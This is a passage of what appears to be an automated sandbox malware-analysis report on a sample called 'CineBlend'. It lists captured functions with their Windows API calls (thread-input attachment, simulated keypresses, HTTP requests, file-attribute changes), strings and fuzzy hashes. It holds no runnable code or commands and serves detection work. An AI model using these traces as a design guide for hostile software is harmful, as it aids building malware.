AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B9ABA8,?,00000001), ref: 00B9BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B9ABA8,?,00000001), ref: 00B9BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B9ABA8,?,00000001), ref: 00B9BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B9ABA8,?,00000001), ref: 00B9BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B9ABA8,?,00000001), ref: 00B9BBE4

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: a28b4cbe19c6c87a6a31cfcd0aeb03609ee709fc2aac2eb5b8cc99350ae7aafb
Instruction ID: 1435a0ddd24dc9a076b2848865791463a9fecd4631a91be9cd63e15a2cbd08a2
Opcode Fuzzy Hash: a28b4cbe19c6c87a6a31cfcd0aeb03609ee709fc2aac2eb5b8cc99350ae7aafb
Instruction Fuzzy Hash: 5A316FB6904204AFDF149B24EE88F6E7BE9EB4931AF114075FB05E71E4D7749940CB60

Function 00B62FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B63007

Part of subcall function 00B62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?), ref: 00B62D4E
Part of subcall function 00B62D38: GetLastError.KERNEL32(?,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?,?), ref: 00B62D60

_free.LIBCMT ref: 00B63013
_free.LIBCMT ref: 00B6301E
_free.LIBCMT ref: 00B63029
_free.LIBCMT ref: 00B63034
_free.LIBCMT ref: 00B6303F
_free.LIBCMT ref: 00B6304A
_free.LIBCMT ref: 00B63055
_free.LIBCMT ref: 00B63060
_free.LIBCMT ref: 00B6306E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 049dbba4de334f7cbca4a97add4048978ddbc5c9a047556a82a9c872491c7551
Instruction ID: d8cf83ab97b791dc5757681311c18c3bffa2e073388cd910bb760135ad9ecf7f
Opcode Fuzzy Hash: 049dbba4de334f7cbca4a97add4048978ddbc5c9a047556a82a9c872491c7551
Instruction Fuzzy Hash: CF118676500508BFDB01EF94C942DDD3BE5EF06390B9145E5FA08DF222DA36EE519B90

Function 00BA8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BA89F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00BA8A06
GetFileAttributesW.KERNEL32(?), ref: 00BA8A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00BA8A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00BA8A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00BA8AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BA8AF5

Strings

*.*, xrefs: 00BA8AAB

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: dffe0512a892f9fac0fe0448a30a5aa3b6f1ffa5268d56ca78dacb146d76f2b9
Instruction ID: 55a770f666f21028ad432fe8965f787003e02a09a918cb0b189706465d7e7f86
Opcode Fuzzy Hash: dffe0512a892f9fac0fe0448a30a5aa3b6f1ffa5268d56ca78dacb146d76f2b9
Instruction Fuzzy Hash: 4C818F729083459BCB24EF14C484ABBB7E8FF8A310F5448AEF885D7650EF34D9458B92

Function 00B37447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00B374D7

Part of subcall function 00B37567: GetClientRect.USER32(?,?), ref: 00B3758D
Part of subcall function 00B37567: GetWindowRect.USER32(?,?), ref: 00B375CE
Part of subcall function 00B37567: ScreenToClient.USER32(?,?), ref: 00B375F6

GetDC.USER32 ref: 00B76083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B76096
SelectObject.GDI32(00000000,00000000), ref: 00B760A4
SelectObject.GDI32(00000000,00000000), ref: 00B760B9
ReleaseDC.USER32(?,00000000), ref: 00B760C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B76152

Strings

U, xrefs: 00B76021

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: e01dee779dec8477f9e46c4e59368db1eafb8af567326dcef7f48baf479bf12e
Instruction ID: 5ca9a75a3755d666628d10172a320ded8ed66cac97a74f611f4b0d660e9222fa
Opcode Fuzzy Hash: e01dee779dec8477f9e46c4e59368db1eafb8af567326dcef7f48baf479bf12e
Instruction Fuzzy Hash: 9071C071500605DFCF258F64CCC9EAA7BF5FF49310F2482EAE9696A2A6CB319C40DB50

Function 00BC955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B324B0

Part of subcall function 00B319CD: GetCursorPos.USER32(?), ref: 00B319E1
Part of subcall function 00B319CD: ScreenToClient.USER32(00000000,?), ref: 00B319FE
Part of subcall function 00B319CD: GetAsyncKeyState.USER32(00000001), ref: 00B31A23
Part of subcall function 00B319CD: GetAsyncKeyState.USER32(00000002), ref: 00B31A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00BC95C7
ImageList_EndDrag.COMCTL32 ref: 00BC95CD
ReleaseCapture.USER32 ref: 00BC95D3
SetWindowTextW.USER32(?,00000000), ref: 00BC966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BC9681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00BC975B

Strings

@GUI_DRAGFILE, xrefs: 00BC96F6
@GUI_DROPID, xrefs: 00BC96AD

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 0dd9ae52d32b2f7c337f287fd80b1a7997fbd75b0ccc9eca9591a03975078675
Instruction ID: 2365481e143ae0fff5b362f76180f6ec7583dc67a2cdb2b7d799594a2cdf4d73
Opcode Fuzzy Hash: 0dd9ae52d32b2f7c337f287fd80b1a7997fbd75b0ccc9eca9591a03975078675
Instruction Fuzzy Hash: 4D516C75204304AFD704EF24CC5AFAA77E4FB88714F500A6DF996972E1DB709908CB52

Function 00BACC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BACCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BACCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BACD0F
GetLastError.KERNEL32 ref: 00BACD67
SetEvent.KERNEL32(?), ref: 00BACD7B
InternetCloseHandle.WININET(00000000), ref: 00BACD86

Strings

, xrefs: 00BACD00

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 08a3bb905f2fef520586a198d6ea5b6367edbae47cc8326740607c309243c7fd
Instruction ID: 091448532209a373c88ed9ff476d2122da4d10133fcb7554ba453e1c7d61e792
Opcode Fuzzy Hash: 08a3bb905f2fef520586a198d6ea5b6367edbae47cc8326740607c309243c7fd
Instruction Fuzzy Hash: 80314175604604AFD7219F65CC88EAB7FFCEB4A744B10457EF48697200DB34DD049BA1

Function 00B9A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B755AE,?,?,Bad directive syntax error,00BCDCD0,00000000,00000010,?,?), ref: 00B9A236
LoadStringW.USER32(00000000,?,00B755AE,?), ref: 00B9A23D

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B9A301

Strings

Error: , xrefs: 00B9A2CF
Line %d:, xrefs: 00B9A28C
%s (%d) : ==> %s.: %s %s, xrefs: 00B9A26B
Line %d (File "%s"):, xrefs: 00B9A2A7
., xrefs: 00B9A2E7

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: adc659028f3cfa19221404a32a0610a6d1654e17edfab176a0a59305c529ded3
Instruction ID: 790585fcc2607caf97cff437fd144f470a7b4b53f66aa2d8247ab238ac7c96bf
Opcode Fuzzy Hash: adc659028f3cfa19221404a32a0610a6d1654e17edfab176a0a59305c529ded3
Instruction Fuzzy Hash: 19212D3194021EABCF15AFA0CC46EEE7BB9BF18704F0444E9F615660A2EB71A618DB51

Function 00B929EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00B929F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00B92A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B92A9A

Strings

details, xrefs: 00B92A48
largeicons, xrefs: 00B92A2E
smallicons, xrefs: 00B92A62
list, xrefs: 00B92A7C
SHELLDLL_DefView, xrefs: 00B92A19

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 0b5286d63595dc13df7414af35abd0fda830bde3904cceb127ab337cfddf6121
Instruction ID: 64939ce71afbe9c923cde970011ac7374f60a38cbf94decdc21187fecdc37e85
Opcode Fuzzy Hash: 0b5286d63595dc13df7414af35abd0fda830bde3904cceb127ab337cfddf6121
Instruction Fuzzy Hash: 6A11A37BA4430AB9FE246720EC07EA677EDDF15725B2000F6FE04E60E2FB6568494A14

Function 00B37567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00B3758D
GetWindowRect.USER32(?,?), ref: 00B375CE
ScreenToClient.USER32(?,?), ref: 00B375F6
GetClientRect.USER32(?,?), ref: 00B3773A
GetWindowRect.USER32(?,?), ref: 00B3775B

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: f71488fb898468f280f8ddfa30e5d6cf3048ba26f6ec8e19919b44bb933f0bf2
Instruction ID: 3ab752153a6b3a16876fe77a61c0c1dc03476c1f0a132c3dc6ae2763dfdd471d
Opcode Fuzzy Hash: f71488fb898468f280f8ddfa30e5d6cf3048ba26f6ec8e19919b44bb933f0bf2
Instruction Fuzzy Hash: 4BC1617990464ADFDB20CFA8C580BEDB7F1FF18310F24845AE8A9E7250DB34A951DB60

Function 00B6D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00B6D237
_free.LIBCMT ref: 00B6D2A2
_free.LIBCMT ref: 00B6D2C8
_free.LIBCMT ref: 00B6D2F1
_free.LIBCMT ref: 00B6D329
_free.LIBCMT ref: 00B6D35A
_free.LIBCMT ref: 00B6D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00B6D41C
_free.LIBCMT ref: 00B6D435

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 579e3029c0d1a3c41ab06ff2087e1066556906d1f55a1bf80ce76518a1d6a32f
Instruction ID: d0bfac4c4f00a9bffb124d53c9062b2c5f67fe7b3f722555ebf33de7ec3b8446
Opcode Fuzzy Hash: 579e3029c0d1a3c41ab06ff2087e1066556906d1f55a1bf80ce76518a1d6a32f
Instruction Fuzzy Hash: 6661E771F04705AFDB21AF75D891B6DBBE4EF02320B0905EDED44E7281D6399940C751

Function 00BC5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00BC5C24
ShowWindow.USER32(?,00000000), ref: 00BC5C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00BC5C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00BC5C6F

Part of subcall function 00BC79F2: DeleteObject.GDI32(00000000), ref: 00BC7A1E

GetWindowLongW.USER32(?,000000F0), ref: 00BC5CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BC5CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BC5CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00BC5D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00BC5D34

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 0a799b549ab29cf7005e8d092e133c8ea3662c3905f5958cb7d48bd8a828115e
Instruction ID: f6c8467d824ef5452e0785895a40ba01a8af54170c795223907396fbf98324a3
Opcode Fuzzy Hash: 0a799b549ab29cf7005e8d092e133c8ea3662c3905f5958cb7d48bd8a828115e
Instruction Fuzzy Hash: 1C516C34640B08BFEF349F28CC49F997BE5EB04754F2481AAB6259A1E1CB75B9C0DB41

Function 00B313A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00B728D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B728EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B728FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B72912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B72933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B311F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B72942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B7295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B311F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B7296E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 6b0e90df40af4605bd14ff5c4004e48d4594e0e46e22917c9111f2f67ce1d027
Instruction ID: 19adf5d1401499e80eb8ff5ec375f537f0928c2efe00c4356746e8005e7cbc49
Opcode Fuzzy Hash: 6b0e90df40af4605bd14ff5c4004e48d4594e0e46e22917c9111f2f67ce1d027
Instruction Fuzzy Hash: 3E515B34600205AFDB24CF29CC85FAA77F9EF48710F208969FA56972A0DB70E950DF50

Function 00BACB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BACBC7
GetLastError.KERNEL32 ref: 00BACBDA
SetEvent.KERNEL32(?), ref: 00BACBEE

Part of subcall function 00BACC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BACCB7
Part of subcall function 00BACC98: GetLastError.KERNEL32 ref: 00BACD67
Part of subcall function 00BACC98: SetEvent.KERNEL32(?), ref: 00BACD7B
Part of subcall function 00BACC98: InternetCloseHandle.WININET(00000000), ref: 00BACD86

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: a118bf33d3d706db3ff5a53b1425d47c6d3893b9d6af0f5a2a0e78370b9b6bd8
Instruction ID: 75baa9559b7aeaafddb6e120d7294944ef5aabffc9ab38978124d67395ce09e8
Opcode Fuzzy Hash: a118bf33d3d706db3ff5a53b1425d47c6d3893b9d6af0f5a2a0e78370b9b6bd8
Instruction Fuzzy Hash: 48316B75604705BFDB219F75CD84A6ABFF8FF4A310B04456EF85A87610EB31E814ABA0

Function 00B92EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B94393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B943AD
Part of subcall function 00B94393: GetCurrentThreadId.KERNEL32 ref: 00B943B4
Part of subcall function 00B94393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B92F00), ref: 00B943BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00B92F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B92F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B92F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B92F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B92F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B92F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B92F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B92F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B92F74

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 50c88391c75f1f6ab7ee3f7273322e9e45c4c2e21e2d22ae675e96319eb8feca
Instruction ID: d2d7c3a164bf2aa9f0e0138c77cd2499c543e435e829eae66561669aaef7e817
Opcode Fuzzy Hash: 50c88391c75f1f6ab7ee3f7273322e9e45c4c2e21e2d22ae675e96319eb8feca
Instruction Fuzzy Hash: D001D430784214BBFB1067689C8AF593F9ADB4DB11F110075F358AF1E0CDE26444CAA9

Function 00B92150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B91D95,?,?,00000000), ref: 00B92159
HeapAlloc.KERNEL32(00000000,?,00B91D95,?,?,00000000), ref: 00B92160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B91D95,?,?,00000000), ref: 00B92175
GetCurrentProcess.KERNEL32(?,00000000,?,00B91D95,?,?,00000000), ref: 00B9217D
DuplicateHandle.KERNEL32(00000000,?,00B91D95,?,?,00000000), ref: 00B92180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B91D95,?,?,00000000), ref: 00B92190
GetCurrentProcess.KERNEL32(00B91D95,00000000,?,00B91D95,?,?,00000000), ref: 00B92198
DuplicateHandle.KERNEL32(00000000,?,00B91D95,?,?,00000000), ref: 00B9219B
CreateThread.KERNEL32(00000000,00000000,00B921C1,00000000,00000000,00000000), ref: 00B921B5

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
